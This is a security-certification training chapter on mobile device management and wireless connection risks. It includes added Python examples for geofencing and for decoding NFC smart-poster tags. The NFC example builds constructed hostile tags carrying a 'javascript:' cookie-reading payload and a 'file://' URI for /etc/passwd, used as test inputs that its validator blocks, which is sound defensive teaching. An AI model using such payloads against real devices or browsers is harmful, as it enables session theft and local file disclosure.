Geolocation is the use of network attributes to identify or estimate the physical position of a device. The device uses location services to determine its current position. Location services can make use of two systems:

• Global Positioning System (GPS)—a means of determining the device's latitude and longitude based on information received from satellites via a GPS sensor.

• Indoor Positioning System (IPS)—works out a device's location by triangulating its proximity to other radio sources, such as cell towers, Wi-Fi access points, and Bluetooth/RFID beacons.

Teaching Tip: Make sure students can distinguish the various geo-something technologies.

Location services are available to any app where the user has granted the app permission to use them.


Using Find My Device to locate an Android smartphone. (Android is a trademark of Google LLC.)

The primary concern surrounding location services is one of privacy. Although very
useful for maps and turn-by-turn navigation, it provides a mechanism to track an
individual's movements, and therefore their social and business habits. The problem
is further compounded by the plethora of mobile apps that require access to location
services and then both send the information to the application developers and store
it within the device's file structure. If an attacker can gain access to this data, then
stalking, social engineering, and even identity theft become real possibilities.

Geofencing and Camera/Microphone Enforcement

Geofencing is the practice of creating a virtual boundary based on real-world geography. Geofencing can be a useful tool with respect to controlling the use of camera or video functions or applying context-aware authentication. An organization may use geofencing to create a perimeter around its office property, and subsequently, limit the functionality of any devices that exceed this boundary. An unlocked smartphone could be locked and forced to re-authenticate when entering the premises, and the camera and microphone could be disabled. The device's position is obtained from location services.
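The geofence evaluation described above, as an added example (not from the guide or any EMM product): a circular perimeter around the office, a distance check against the location-services fix that allows for the fix's reported accuracy, and the lock, re-authentication and camera/microphone actions triggered on crossing the boundary. The coordinates, radius and fixes are constructed values.

```python
import math

EARTH_RADIUS_M = 6_371_000.0

def haversine_m(lat1, lon1, lat2, lon2):
    """Great-circle distance in metres between two latitude/longitude points."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi, dlam = p2 - p1, math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlam / 2) ** 2
    return 2 * EARTH_RADIUS_M * math.asin(math.sqrt(a))

class Geofence:
    """Circular perimeter around a site, such as the office property in the text."""
    def __init__(self, lat, lon, radius_m):
        self.lat, self.lon, self.radius_m = lat, lon, radius_m

    def may_contain(self, lat, lon, accuracy_m=0.0):
        """True if the fix could lie inside the perimeter once its reported error
        radius is allowed for. Restrictions apply inside, so an uncertain fix near
        the edge is treated as inside (fail closed), never as outside."""
        return haversine_m(self.lat, self.lon, lat, lon) - accuracy_m <= self.radius_m

ENTER_ACTIONS = ["lock_screen", "require_reauth", "disable_camera", "disable_microphone"]
LEAVE_ACTIONS = ["enable_camera", "enable_microphone"]

def apply_geofence_policy(fence, fix, was_inside):
    """Evaluate one location-services fix; actions fire only on a boundary crossing."""
    inside = fence.may_contain(fix["lat"], fix["lon"], fix["accuracy_m"])
    if inside and not was_inside:
        return inside, list(ENTER_ACTIONS)
    if was_inside and not inside:
        return inside, list(LEAVE_ACTIONS)
    return inside, []

def run_trace(fence, fixes):
    """Feed a sequence of fixes through the policy; returns (inside, actions) per fix."""
    inside, log = False, []
    for fix in fixes:
        inside, actions = apply_geofence_policy(fence, fix, inside)
        log.append((inside, actions))
    return log

# Constructed data for this example: a 150 m office perimeter and three fixes
# (approaching from outside, arriving on site, walking out again). GPS outdoors
# reports a small error radius; an IPS fix indoors is typically less precise.
OFFICE = Geofence(51.5007, -0.1246, 150.0)
TRACE = [
    {"lat": 51.5200, "lon": -0.1000, "accuracy_m": 10.0},   # about 2.7 km away
    {"lat": 51.5010, "lon": -0.1240, "accuracy_m": 15.0},   # roughly 50 m from the centre
    {"lat": 51.5030, "lon": -0.1246, "accuracy_m": 20.0},   # about 255 m north, outside
]

if __name__ == "__main__":
    for fix, (inside, actions) in zip(TRACE, run_trace(OFFICE, TRACE)):
        print(f"{fix['lat']:.4f},{fix['lon']:.4f} inside={inside} actions={actions}")
```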

Restricting device permissions such as camera and screen capture using Intune. (Screenshot used with permission from Microsoft.)


GPS Tagging

GPS tagging is the process of adding geographical identification metadata, such as the latitude and longitude where the device was located at the time, to media such as photographs, SMS messages, video, and so on. It allows the app to place the media at specific latitude and longitude coordinates. GPS tagging is highly sensitive personal information and potentially confidential organizational data also. GPS tagged pictures uploaded to social media could be used to track a person's movements and location. For example, a Russian soldier revealed troop positions by uploading GPS tagged selfies to Instagram (arstechnica.com/tech-policy/2014/08/opposite-of-opsec-russian-soldier-posts-selfies-from-inside-ukraine).

Show Slide(s): Application Management

Application Management

When a device is joined to the corporate network through enrollment with management software, it can be configured into an enterprise workspace mode in which only a certain number of authorized applications can run.

Teaching Tip: Note that sideloading is both a way of adding enterprise apps and an undesirable behavior that needs to be prevented on corporate-owned devices.

Endpoint management software such as Microsoft Intune can be used to approve or prohibit apps. (Screenshot used with permission from Microsoft.)

A trusted app source is one that is managed by a service provider. The service provider authenticates and authorizes valid developers, issuing them with a certificate to use to sign their apps and warrant them as trusted. It may also analyze code submitted to ensure that it does not pose a security or privacy risk to its customers (or remove apps that are discovered to pose such a risk). It may apply other policies that developers must meet, such as not allowing apps with adult content or apps that duplicate the function of core OS apps.

The mobile OS defaults to restricting app installations to the linked store (App Store for iOS and Play for Android). Most consumers are happy with this model but it does not work so well for enterprises. It might not be appropriate to deliver a custom corporate app via a public store, where anyone could download it. Apple operates enterprise developer and distribution programs to solve this problem, allowing private app distribution via Apple Business Manager (developer.apple.com/business/distribute). Google's Play store has a private channel option, called Managed Google Play. Both these options allow an EMM/UEM suite to push apps from the private channel to the device.


Unlike iOS, Android allows for selection of different stores and installation of untrusted apps from any third party, if this option is enabled by the user. With unknown sources enabled, untrusted apps can be downloaded from a website and installed using the .apk file format. This is referred to as sideloading.

Conversely, a management suite might be used to prevent the use of third-party stores or sideloading and block unapproved app sources.

Show Slide(s): Content Management

Content Management

Containerization allows the employer to manage and maintain the portion of the device that interfaces with the corporate network. An enterprise workspace with a defined selection of apps and a separate container is created. This container isolates corporate apps from the rest of the device. There may be a requirement for additional authentication to access the workspace.

Teaching Tip: Note that the security of these containerization mechanisms depends upon the device not being rooted.

The container can also enforce storage segmentation. With storage segmentation the container is associated with a directory on the persistent storage device that is not readable or writable by apps that are not in the container. Conversely, apps cannot write to areas outside the container, such as external media or using copy and paste to a non-container app. App network access might be restricted to a VPN tunneled through the organization's security system.

The enterprise is thereby able to maintain the security it needs, without having to enforce policies that affect personal use, apps, or data.

Containerization also assists content management and data loss prevention (DLP) systems. A content management system tags corporate or confidential data and prevents it from being shared or copied to unauthorized external media or channels, such as non-corporate email systems or cloud storage services.

Rooting and Jailbreaking

As with Windows and Linux, the account used to install the OS and run kernel-level processes is not the one used by the device owner. Users who want to avoid the restrictions that some vendors, handset OEMs, and telecom providers (carriers) put on the devices must use some type of privilege escalation:

• Rooting—this term is associated with Android devices. Some vendors provide authorized mechanisms for users to access the root account on their device. For some devices it is necessary to exploit a vulnerability or use custom firmware. Custom firmware is essentially a new Android image applied to the device. This can also be referred to as a custom ROM, after the term for the read-only memory chips that used to hold firmware.

• Jailbreaking—iOS is more restrictive than Android, so the term "jailbreaking" became popular for exploits that enabled the user to obtain root privileges, sideload apps, change or add carriers, and customize the interface. iOS jailbreaking is accomplished by booting the device with a patched kernel. For most exploits, this can only be done when the device is attached to a computer when it boots (tethered jailbreak).

• Carrier unlocking—for either iOS or Android, this means removing the restrictions that lock a device to a single carrier.

Rooting or jailbreaking mobile devices involves subverting the security measures on the device to gain administrative access to it. This also has the side effect of leaving many security measures permanently disabled. If the user has root permissions, then essentially any management agent software running on the device is compromised.

Teaching Tip: Detecting whether a device has been rooted is not straightforward. You might want to point students to Google's attestation API documentation for more information on root detection (developer.android.com/training/safetynet/attestation).


If the user has applied a custom firmware image, they could have removed the protections that enforce segmentation. The device can no longer be assumed to run a trusted OS.

EMM/UEM has routines to detect a rooted or jailbroken device or custom firmware with no valid developer code signature and prevent access to an enterprise app, network, or workspace. Containerization and enterprise workspaces can use cryptography to protect the workspace in a way that is much harder to compromise than a local agent, even from a rooted/jailbroken device.


Review Activity:
Mobile Device Management
Answer the following questions:

1. What type of deployment model(s) allow users to select the mobile device
make and model?

Bring Your Own Device (BYOD) and Choose Your Own Device (CYOD).

2. How does VDI work as a mobile deployment model?

Virtual Desktop Infrastructure (VDI) allows a client device to access a VM. In this scenario, the mobile device is the client device. Corporate data is stored and processed on the VM so there is less chance of it being compromised, even though the client device itself is not fully managed.

3. Company policy requires that you ensure your smartphone is secured from
unauthorized access in case it is lost or stolen. To prevent someone from
accessing data on the device immediately after it has been turned on, what
security control should be used?

Screen lock.

4. An employee's car was recently broken into, and the thief stole a company
tablet that held a great deal of sensitive data. You've already taken the
precaution of securing plenty of backups of that data. What should you do
to be absolutely certain that the data doesn't fall into the wrong hands?

Remotely wipe the device, also referred to as a kill switch.

5. What is containerization?

A mobile app or workspace that runs within a partitioned environment to prevent other (unauthorized) apps from interacting with it.

6. What is the process of sideloading?

The user installs an app directly onto the device rather than from an official app store.

7. Why might a company invest in device control software that prevents the
use of recording devices within company premises?

To hinder physical reconnaissance and espionage.

8. Why is a rooted or jailbroken device a threat to enterprise security?

Enterprise Mobility Management (EMM) solutions depend on the device user not being able to override their settings or change the effect of the software. A rooted or jailbroken device means that the user could subvert the access controls.


Topic 13B
Implement Secure Mobile Device Connections

EXAM OBJECTIVES COVERED
1.4 Given a scenario, analyze potential indicators associated with network attacks
3.5 Given a scenario, implement secure mobile solutions

As well as authentication and authorization for features and apps, management suites can also assist with networking options for mobile. You must be able to disable communication types that are not secure for local networks, and advise users about the security of communications when they use their devices remotely.

Teaching Tip: This topic completes the coverage of objective 3.5 by looking at connection methods. We also cover the Bluetooth, NFC, and RFID attacks from 1.4.

Cellular and GPS Connection Methods

Mobile devices use a variety of connection methods to establish communications in local and personal area networks and for Internet data access via service providers.

Locking down Android connectivity methods with Intune. Note that most settings can be applied only to Samsung Knox-capable devices. (Screenshot used with permission from Microsoft.)

Cellular Data Connections

Smartphones and some tablets use the cell phone network for calls and data access. A cellular data connection is less likely to be subject to monitoring and filtering. It may be appropriate to disable it when a device has access to an enterprise network or data, to prevent its use for data exfiltration.

There have been attacks and successful exploits against the major infrastructure and protocols underpinning the telecoms network, notably the SS7 hack (theregister.com/2017/05/03/hackers_fire_up_ss7_flaw). There is little that either companies or individuals can do about these weaknesses. The attacks require a high degree of sophistication and are relatively uncommon.

Global Positioning System (GPS)

A global positioning system (GPS) sensor fixes the device position by trilateration, timing the signals received from several orbiting GPS satellites. As acquiring a fix from the satellites alone can be slow, most smartphones use Assisted GPS (A-GPS), which downloads satellite orbit data and a coarse starting position (derived from the nearest cell towers) over the cellular data connection to speed up the fix. GPS satellites are operated by the US Government. Some GPS sensors can also use signals from other satellite constellations, operated by the EU (Galileo), Russia (GLONASS), or China (BeiDou).

GPS signals can be jammed or even spoofed using specialist radio equipment. This might be used to defeat geofencing mechanisms, for instance (kaspersky.com/blog/gps-spoofing-protection).

Wi-Fi and Tethering Connection Methods

Mobile devices usually default to using a Wi-Fi connection for data, if present. If the user establishes a connection to a corporate network using strong WPA3 security, there is a fairly low risk of eavesdropping or man-in-the-middle attacks. The risks from Wi-Fi come from users connecting to open access points or possibly a rogue access point imitating a corporate network. These allow the access point owner to launch any number of attacks, even potentially compromising sessions with secure servers (using a DNS spoofing attack, for instance).

Personal Area Networks (PANs)


Personal area networks (PANs) enable connectivity between a mobile device and peripherals. Ad hoc (or peer-to-peer) networks between mobile devices, or between mobile devices and other computing devices, can also be established. In terms of corporate security, these peer-to-peer functions should generally be disabled. It might be possible for an attacker to exploit a misconfigured device and obtain a bridged connection to the corporate network.

Ad Hoc Wi-Fi and Wi-Fi Direct

Wireless stations can establish peer-to-peer connections with one another, rather than using an access point. This can also be called an ad hoc network, meaning that the network is not made permanently available. There is no widely supported, standards-based implementation of ad hoc networking on mobile devices, however. MITRE have a project to enable Android smartphones to configure themselves in an ad hoc network (mitre.org/research/technology-transfer/open-source-software/smartphone-ad-hoc-networking-span).

Wi-Fi Direct allows one-to-one connections between stations, though in this case one of the devices actually functions as a soft access point. Wi-Fi Direct depends on Wi-Fi Protected Setup (WPS), which has well-known weaknesses, notably brute-forceable PINs. Android supports operating as a Wi-Fi Direct AP, but iOS uses a proprietary multipeer connectivity framework. You can connect an iOS device to another device running a Wi-Fi Direct soft AP, however.

There are also wireless mesh products from vendors such as Netgear and Google that allow all types of wireless devices to participate in a peer-to-peer network. These products might not be interoperable, though more are now supporting the EasyMesh standard (wi-fi.org/discover-wi-fi/wi-fi-easymesh).

Tethering and Hotspots


A smartphone can share its Internet connection with another device, such as a PC. Where this connection is shared over Wi-Fi with multiple other devices, the smartphone can be described as a hotspot. Where the connection is shared by connecting the smartphone to a PC over a USB cable or with a single PC via Bluetooth, it can be referred to as tethering. However, the term "Wi-Fi tethering" is also quite widely used to mean a hotspot. This type of functionality would typically be disabled when the device is connected to an enterprise network, as it might be used to circumvent security mechanisms, such as data loss prevention or web content filtering policies.

Bluetooth Connection Methods

Bluetooth is one of the most popular technologies for implementing PANs. While native Bluetooth has fairly low data rates, it can be used to pair with another device and then use a Wi-Fi link for data transfer. This sort of connectivity is implemented by iOS's AirDrop feature.

Bluetooth devices have a few known security issues:

• Device discovery—a device can be put into discoverable mode, meaning that it advertises its presence and will accept pairing requests from other Bluetooth devices nearby. Unfortunately, even a device in non-discoverable mode is quite easy to detect.

• Authentication and authorization—devices authenticate ("pair") using a simple passkey configured on both devices. This should always be changed to some secure phrase and never left as the default. Also, check the device's pairing list regularly to confirm that the devices listed are valid.

• Malware—there are proof-of-concept Bluetooth worms and application exploits, most notably the BlueBorne exploit (armis.com/blueborne), which can compromise any active and unpatched system regardless of whether discovery is enabled and without requiring any user intervention. There are also vulnerabilities in the authentication schemes of many devices. Keep devices updated with the latest firmware.

Pairing a computer with a smartphone. (Screenshot used with permission from Microsoft.)


It is also the case that using a control center toggle may not actually turn off the Bluetooth radio on a mobile device. If there is any doubt about patch status or exposure to vulnerabilities, Bluetooth should be fully disabled through device settings.

Unless some sort of authentication is configured, a discoverable device is vulnerable to bluejacking, a sort of spam where someone sends you an unsolicited text (or picture/video) message or vCard (contact details). This can also be a vector for malware, as demonstrated by the Obad Android Trojan malware (securelist.com/the-most-sophisticated-android-trojan/35929).

Bluesnarfing refers to using an exploit in Bluetooth to steal information from someone else's phone. The exploit (now patched) allows attackers to circumvent the authentication mechanism. Even without an exploit, a short (4-digit) PIN code is vulnerable to brute force password guessing.

Other significant risks come from the device being connected to. A peripheral device with malicious firmware can be used to launch highly effective attacks. This type of risk has a low likelihood, as the resources required to craft such malicious peripherals are demanding.

Infrared and RFID Connection Methods

Infrared signaling has been used for PANs in the past (IrDA), but the use of infrared in modern smartphones and wearable technology focuses on two other uses:

• IR blaster—this allows the device to interact with an IR receiver and operate a device such as a TV or HVAC unit as though it were the remote control handset.

• IR sensor—these are used as proximity sensors (to detect when a smartphone is being held to the ear, for instance) and to measure health information (such as heart rate and blood oxygen levels).

Radio Frequency ID (RFID) is a means of encoding information into passive tags, which can be easily attached to devices, structures, clothing, or almost anything else. A passive tag can have a range from a few centimeters to a few meters. When a reader is within range of the tag, it produces an electromagnetic wave that powers up the tag and allows the reader to collect information from it or to change the values encoded in the tag. There are also battery-powered active tags that can be read at much greater distances (hundreds of meters).

One type of RFID attack is skimming, which is where an attacker uses a fraudulent RFID reader to read the signals from a contactless bank card. A basic tag will answer any reader that powers it, so sensitive information stored on a tag must be protected using cryptography. It is also possible (in theory) to design RFID tags to inject malicious code to try to exploit a vulnerability in a reader.

Near Field Communications and Mobile Payment Services

NFC is based on a particular type of radio frequency ID (RFID). NFC sensors and functionality are now commonly incorporated into smartphones. An NFC chip can also be used to read passive RFID tags at close range. It can also be used to configure other types of connections (pairing Bluetooth devices, for instance) and for exchanging information, such as contact cards. An NFC transaction is sometimes known as a bump, after an early mobile sharing app of that name; Android later provided similar tap-to-share functionality over NFC as Android Beam. The typical use case is in smart posters, where the user can tap the tag in the poster to open a linked web page via the information coded in the tag. Attacks could be developed using vulnerabilities in handling the tag (securityboulevard.com/2019/10/nfc-false-tag-vulnerability-cve-2019-9295). It is also possible that there may be some way to exploit NFC by crafting tags to direct the device browser to a malicious web page where the attacker could try to exploit any vulnerabilities in the browser.

Teaching Tip: Sophos Security has produced a video about NFC card skimming (facebook.com/SophosSecurity/videos/10155345347100017). They also evaluate card and wallet protectors designed to block NFC transmissions.
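Added example (not part of the CompTIA guide): a Python decoder for the NFC Forum NDEF URI record that a smart poster carries, with the check a handset or an enterprise tag-reading app should apply before handing the link to the browser. A URI record's first payload byte selects a prefix such as https://www., and identifier code 0x00 means "no prefix", which is where an attacker can plant a javascript: or file: scheme. The tags are constructed inline, the prefix table is abbreviated, and the host allow-list is an assumption made for illustration.

```python
"""Decode an NFC Forum NDEF URI record (the format used by "smart poster"
tags) and decide whether a handset should follow the link it carries.

Constructed example: the tag bytes below are built inline with
build_uri_record(); nothing is read from real NFC hardware.
"""
from urllib.parse import urlsplit

# NFC Forum URI Record Type Definition: the first payload byte selects a
# prefix that is prepended to the rest of the UTF-8 payload. Only the most
# common identifier codes are listed; the full table runs to 0x23.
# Code 0x00 means "no prefix", which is where an attacker-chosen scheme
# such as javascript: or intent: shows up.
URI_PREFIXES = {
    0x00: "",
    0x01: "http://www.",
    0x02: "https://www.",
    0x03: "http://",
    0x04: "https://",
    0x05: "tel:",
    0x06: "mailto:",
    0x1D: "file://",
}

TNF_WELL_KNOWN = 0x01  # Type Name Format value for NFC Forum well-known types


def parse_ndef_uri_record(raw: bytes) -> str:
    """Parse one short-record NDEF URI ('U') record and return the full URI.

    Raises ValueError for anything that is not a well-formed URI record,
    including payloads that claim more bytes than the tag actually holds.
    """
    if len(raw) < 4:
        raise ValueError("record too short for an NDEF header")
    flags = raw[0]
    short_record = bool(flags & 0x10)  # SR bit: payload length is one byte
    has_id = bool(flags & 0x08)        # IL bit: an ID length field follows
    tnf = flags & 0x07
    if tnf != TNF_WELL_KNOWN or not short_record:
        raise ValueError("not a short, well-known NDEF record")
    type_len, payload_len = raw[1], raw[2]
    pos = 3
    id_len = 0
    if has_id:
        id_len = raw[pos]
        pos += 1
    rec_type = raw[pos:pos + type_len]
    pos += type_len + id_len  # skip the type and the optional ID field
    if rec_type != b"U":
        raise ValueError(f"not a URI record: type={rec_type!r}")
    payload = raw[pos:pos + payload_len]
    if payload_len == 0 or len(payload) != payload_len:
        raise ValueError("payload length does not match the bytes present")
    code, rest = payload[0], payload[1:]
    if code not in URI_PREFIXES:
        raise ValueError(f"unsupported URI identifier code 0x{code:02x}")
    return URI_PREFIXES[code] + rest.decode("utf-8")  # UnicodeDecodeError is a ValueError


def build_uri_record(code: int, rest: str) -> bytes:
    """Build one short NDEF 'U' record: header 0xD1 = MB, ME, SR set, TNF=1."""
    payload = bytes([code]) + rest.encode("utf-8")
    return bytes([0xD1, 0x01, len(payload)]) + b"U" + payload


def classify_tag_uri(raw: bytes, allowed_hosts=None):
    """Return ("allow" | "block" | "invalid", uri_or_reason).

    Policy: only http/https links are opened, optionally restricted to an
    allow-list of hosts. Anything else (javascript:, file:, custom schemes,
    malformed records) is blocked before the browser ever sees it.
    """
    try:
        uri = parse_ndef_uri_record(raw)
    except (ValueError, IndexError) as exc:
        return "invalid", str(exc)
    parts = urlsplit(uri)
    if parts.scheme not in ("http", "https"):
        return "block", uri
    if allowed_hosts is not None and parts.hostname not in allowed_hosts:
        return "block", uri
    return "allow", uri


# Constructed tags (not captured from real posters):
GOOD_TAG = build_uri_record(0x02, "example.com/poster")             # https://www.example.com/poster
JS_TAG = build_uri_record(0x00, "javascript:alert(document.cookie)")  # raw scheme via code 0x00
FILE_TAG = build_uri_record(0x1D, "localhost/etc/passwd")           # file://localhost/etc/passwd
TRUNCATED_TAG = GOOD_TAG[:-4]                                        # declared length > bytes present

if __name__ == "__main__":
    for name, tag in [("good", GOOD_TAG), ("javascript", JS_TAG),
                      ("file", FILE_TAG), ("truncated", TRUNCATED_TAG)]:
        print(f"{name:10s} {classify_tag_uri(tag, allowed_hosts={'www.example.com'})}")
```

The scheme check is the important part: a tag writer controls every byte of the payload, so a reader that trusts the prefix table alone and passes the assembled string straight to the browser has handed the attacker a way to choose the scheme. Rejecting records whose declared payload length does not match the bytes read also closes the class of parser bugs that tag-handling CVEs tend to fall into.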
NFC does not provide encryption, so eavesdropping and man-in-the-middle attacks are possible if the attacker can find some way of intercepting the communication and the software services are not encrypting the data.

The widest application of NFC is to make payments via contactless point-of-sale (PoS) machines. To configure a payment service, the user enters their credit card information into a mobile wallet app on the device. The wallet app does not transmit the original credit card information, but a payment token (a substitute card number issued to that device, accompanied by a per-transaction cryptogram) that the card network's token service maps back to the relevant customer account; the merchant never sees the real card number. There are three major mobile wallet apps: Apple Pay, Google Pay (formerly Android Pay), and Samsung Pay.

Despite having a close physical proximity requirement, NFC is vulnerable to several types of attacks. Certain antenna configurations may be able to pick up the signals emitted by NFC from several feet away, giving an attacker the ability to eavesdrop from a more comfortable distance. An attacker with a reader may also be able to skim information from an NFC device in a crowded area, such as a busy train. An attacker may also be able to corrupt data as it is being transferred through a method similar to a DoS attack, by flooding the area with an excess of signals to interrupt the transfer.

Skimming a credit or bank card will give the attacker the long card number and expiry date. Completing fraudulent transactions directly via NFC is much more difficult, as the attacker would have to use a valid merchant account and fraudulent transactions related to that account would be detected very quickly.

USB Connection Methods

Android devices can be connected to a computer via the USB port. Apple devices require a Lightning-to-USB converter cable. Once attached, the computer can access the device's storage, sync or back up apps, and upgrade the firmware.

Some Android USB ports support USB On-The-Go (OTG), and there are adapters for iOS devices. USB OTG allows a port to function either as a host or as a device. For example, a port on a smartphone might operate as a device when connected to a PC, but as a host when connected to a keyboard or external hard drive. The extra pin communicates which mode the port is in.

There are various ways in which USB OTG could be abused. Media connected to the smartphone could host malware. The malware might not be able to affect the smartphone itself but could be spread between host computers or networks via the device. It is also possible that a charging plug could act as a Trojan and try to install apps (referred to as juice-jacking), though modern versions of both iOS and Android now require authorization before the device will accept a data connection.

Teaching Tip: This attack vector doesn't seem to have many actual exploits associated with it, but you could refer students to Wall of Sheep's Juice-Jacking page (wallofsheep.com/pages/juice).

SMS/MMS/RCS and Push Notifications

The Short Message Service (SMS) and Multimedia Message Service (MMS) are operated by the cellular network providers. They allow transmission of text messages and binary files. Vulnerabilities in SMS and the SS7 signaling protocol that underpins it have cast doubt on the security of 2-step verification mechanisms (kaspersky.com/blog/ss7-hacked/25529).

Rich Communication Services (RCS) is designed as a platform-independent advanced messaging service, with a similar feature set to proprietary apps like WhatsApp and iMessage. These features include support for video calling, larger binary attachments, group messaging/calling, and read receipts. RCS is supported by carriers via Universal Profile for Advanced Messaging (gsma.com/futurenetworks/digest/universal-profile-version-2-0-advanced-rcs-messaging). The main drawbacks of RCS are that carrier support is patchy (messages fall back to SMS if RCS is not supported) and there is no end-to-end encryption, at the time of writing (theverge.com/2020/5/27/21271186/google-rcs-t-mobile-encryption-ccmi-universal-profile).

Vulnerabilities in processing attachments and rich formatting have resulted in DoS attacks against certain handsets in the past, so it is important to keep devices patched against known threats.

Push notifications are store services (such as Apple Push Notification Service and Firebase Cloud Messaging, the successor to Google Cloud to Device Messaging) that an app or website can use to display an alert on a mobile device. Users can choose to disable notifications for an app, but otherwise the app developer can target notifications to some or all users with that app installed. Developers need to take care to properly secure the account and services used to send push notifications. There have been examples in the past of these accounts being hacked and used to send fake communications.

Firmware Over-the-Air Updates

A baseband update modifies the firmware of the radio modem(s) used for cellular, Wi-Fi, Bluetooth, NFC, and GPS connectivity. The radio firmware in a mobile device contains an operating system that is separate from the end-user operating system (for example, Android or iOS). The modem uses its own baseband processor and memory, which boots a real-time operating system (RTOS). An RTOS is often used for time-sensitive embedded controllers, of the sort required for the modulation and frequency shifts that underpin radio-based connectivity.

The procedures for establishing radio connections are complex and require strict compliance with regulatory certification schemes, so incorporating these functions in the main OS would make it far harder to bring OS updates to market. Unfortunately, baseband operating systems have been associated with several vulnerabilities over the years, so it is imperative to ensure that updates are applied promptly. These updates are usually pushed to the handset by the device vendor, often as part of OS upgrades. The updates can be delivered wirelessly, either through a Wi-Fi network or the data connection, referred to as over-the-air (OTA). A handset that has been jailbroken or rooted might be able to be configured to prevent baseband updates or apply a particular version manually, but in the general course of things, there is little reason to do so.

There are various ways of exploiting vulnerabilities in the way these updates work. A well-resourced attacker can create an "evil base station" using a Stingray/International Mobile Subscriber Identity (IMSI) catcher. This will allow the attacker to identify the location of cell devices operating in the area. In some circumstances it might be possible to launch a man-in-the-middle attack and abuse the firmware update process to compromise the phone.

Microwave Radio Connection Methods

Cellular networks are microwave radio networks provisioned for multiple subscribers. Microwave radio is also used as a backhaul link from a cell tower to the service provider's network. These links are important to 5G, where many relays are required and provisioning fiber optic cabled backhaul can be difficult. Private microwave links are also used between sites. A microwave link can be provisioned in two modes:

• Point-to-point (P2P) microwave uses high gain antennas to link two sites. High gain means that the antenna is highly directional. Each antenna is pointed directly at the other. In terms of security, this makes it difficult to eavesdrop on the signal, as an intercepting antenna would have to be positioned within the direct path. The microwave modems or routers are also normally paired to one another and can use over-the-air encryption to further mitigate against snooping attacks.

• Point-to-multipoint (P2M) microwave uses smaller sectoral antennas, each covering a separate quadrant. Where P2P is between two sites, P2M links multiple sites or subscriber nodes to a single hub. This can be more cost-efficient in high density urban areas and requires less radio spectrum. Each subscriber node is distinguished by multiplexing. Because of the higher risk of signal interception compared to P2P, it is crucial that links be protected by over-the-air encryption.

Multipoint can be used in other contexts. For example, Bluetooth supports a multipoint mode. This can be used to connect a headset to multiple sources (a PC and a smartphone, for instance) simultaneously.


Review Activity:
Secure Mobile Device Connections
Answer the following questions:

1. How might wireless connection methods be used to compromise the security of a mobile device processing corporate data?

An attacker might set up some sort of rogue access point (Wi-Fi) or cell tower (cellular) to perform eavesdropping or man-in-the-middle attacks. For Personal Area Network (PAN) range communications, there might be an opportunity for an attacker to run exploit code over the channel.

2. Why might enforcement policies be used to prevent USB tethering when a smartphone is brought to the workplace?

This would allow a PC or laptop to connect to the Internet via the smartphone's cellular data connection. This could be used to evade network security mechanisms, such as data loss prevention or content filtering.

3. True or false? A maliciously designed USB battery charger could be used to exploit a mobile device on connection.

True (in theory), though the vector is known to the mobile OS and handset vendors, so the exploit is unlikely to be able to run without user authorization.

4. Chuck, a sales executive, is attending meetings at a professional conference that is also being attended by representatives of other companies in his field. At the conference, he uses his smartphone with a Bluetooth headset to stay in touch with clients. A few days after the conference, he finds that competitors' sales representatives are getting in touch with his key contacts and influencing them by revealing what he thought was private information from his email and calendar. Chuck is a victim of which wireless threat?

Bluesnarfing.


Lesson 13
Summary

You should be able to use endpoint management solutions to apply device and application enforcement and monitoring and understand risks from mobile connection methods and other technologies.

Guidelines for Implementing Secure Mobile Solutions

Follow these guidelines when you deploy or reassess mobile device and application management:

• Select a mobile deployment model that best fits organization security requirements and employee business needs (BYOD, COBO, COPE, CYOD).

• Deploy a mobile/universal endpoint management platform to set device and application policies:

  • Allowed connection methods (cellular, Wi-Fi, tethering, and Bluetooth).

  • Authentication requirements (screen locks, biometric, PIN, context-aware).

  • Blocked device functions (geotagging, camera, microphone).

  • Blocking of rooted/jailbroken/custom firmware/carrier-unlocked devices.

  • Sideloading, workspaces, and storage segmentation for enterprise apps and data.

  • Device encryption and remote wipe.

Teaching Tip: Check that students are confident about the content that has been covered. If there is time, re-visit any content examples that they have questions about. If you have used all the available time for this lesson block, note the issues, and schedule time for a review later in the course.
Lesson 14
Summarizing Secure Application Concepts

LESSON INTRODUCTION

Automation strategies for resiliency, disaster recovery, and incident response put development (programming and scripting) at the heart of secure network administration and operations (DevSecOps). As well as automating operations, more companies are having to maintain bespoke code in customer-facing software, such as web applications. Consequently, secure application development is a competency that will only grow in importance over the course of your career.

Lesson Objectives

In this lesson, you will:

• Analyze indicators of application attacks.

• Analyze indicators of web application attacks.

• Summarize secure coding practices.

• Implement secure script environments.

• Summarize deployment and automation concepts.

Teaching Tip: This lesson covers both application attacks and secure coding practices. The importance of coding examples grows with each syllabus release, and there are a lot of fairly complex concepts to get through, so be prepared to allocate plenty of time to covering this content.

Topic 14A
Analyze Indicators of Application Attacks

EXAM OBJECTIVES COVERED
1.3 Given a scenario, analyze potential indicators associated with application attacks

Attacks against desktop and server applications allow threat actors to run arbitrary code on trusted hosts, allowing them to gain a foothold on the network or move laterally within it. With sufficient privileges and access, an attacker can quickly move to compromising data assets or causing denial of service against critical servers. Not all of these attacks will be detected automatically, so as a security professional, you must be able to identify indicators of arbitrary code execution and privilege escalation from your host monitoring and logging systems.

Teaching Tip: This topic focuses on attacks against binary code and the compromise of hosts (buffer overflow and privilege escalation).

Application Attacks

An application attack targets a vulnerability in OS or application software. An application vulnerability is a design or implementation flaw that can cause the application's security controls to be circumvented or that will cause the application to crash.

Teaching Tip: Note that in most cases, a successful attack can only be identified through the behavior of the compromised process or host, in terms of file system and network activity.

Privilege Escalation

The purpose of most application attacks is to allow the threat actor to run his or her own code on the system. This is referred to as arbitrary code execution. Where the code is transmitted from one machine to another, it can be referred to as remote code execution. The code would typically be designed to install some sort of backdoor or to disable the system in some way (denial of service).

An application or process must have privileges to read and write data and execute functions. Depending on how the software is written, a process may run using a system account, the account of the logged-on user, or a nominated account. If a software exploit works, the attacker may be able to execute arbitrary code with the same privilege level as the exploited process. There are two main types of privilege escalation:

• Vertical privilege escalation (or elevation) is where a user or application can access functionality or data that should not be available to them. For instance, a process might run with local administrator privileges, but a vulnerability allows the arbitrary code to run with higher system privileges.

• Horizontal privilege escalation is where a user accesses functionality or data that is intended for another user. For instance, via a process running with local administrator privileges on a client workstation, the arbitrary code is able to execute as a domain account on an application server.

